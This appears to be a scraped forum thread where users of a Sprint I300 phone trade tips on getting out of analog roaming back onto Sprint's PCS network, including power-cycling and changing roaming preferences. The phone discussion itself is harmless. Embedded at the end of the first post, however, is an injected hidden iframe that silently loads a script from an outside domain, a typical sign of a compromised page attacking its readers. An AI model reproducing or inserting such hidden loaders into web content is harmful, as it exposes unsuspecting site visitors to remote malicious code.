+ Reply to Thread
    jlv

Question Any way to quickly get out of analog roam?

Where I live, I frequently go out of Sprint's network and into analog roam; I'm in a marginal area. What I've noticed is that my I300 is slow to recognize when I get back onto Sprint's network. There are times I know I've just gone out of area, but 1/4 mile down the road I know there coverage. The I300 doesn't pick up on it.

The only way I know to force the I300 to look for Sprint's network is to power off the phone and then power it back on. However, that takes 10s or so and is annoying. All I want is a way to get the I300 to ping the towers.

Now, I've considered trying to dial "*18", but I've not done that yet, mostly because I didn't want to incur the roaming charge if it really tried to place that call over the roaming network.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

jlv
    Ideally, I would have thought that I could just tap the "A" indicator and have it check. But it doesn't do that.

Administrator

Arrow

why dont you just force it to always stay on sprint service?! thats what i do, and it will save some extra juice.

jlv
    I'll try that (I just switched to it). I suspect that it will just mean that I'll have the "no phone service" icon for the duration; i.e., it won't recognize me going back into cover any quicker.

Administrator

Arrow

yes it will say 'no service' and have the analog indicator up there(if it sees analog) but the phone will not switch to analog...

once it "sees" sprint coverage again, it will jump right back into pcs. try and see for yourself!

jlv

dropped calls!

I tried using "Sprint PCS" in the roaming prefs, but when I was using the phone while driving in areas that usually just drop to "one bar" of signal, I had repeated dropped calls! I eventually switched it back to "automatic" and was able to stay connected.

I was really surprised about it, but it seemed that the phone gave up sooner than it should have when it was on "Sprint PCS"-only.

Angry

I have the same problem. Out here in the sticks (northern Arizona) we have a lot of "analog only" areas. When I place my phone on PCS only (recommended by Sprint), I miss calls completely. I have upgraded my plan to include 100 analog minutes, but I (also) would like to know how to get out of analog when I KNOW I have Sprint service.

Anyone? Anyone?

Administrator

Arrow

your best bet is to switch off and switch on if you want to kee it on automatic. if the analog signal is much stronger than the pcs signal at the time, then you will stay in analog...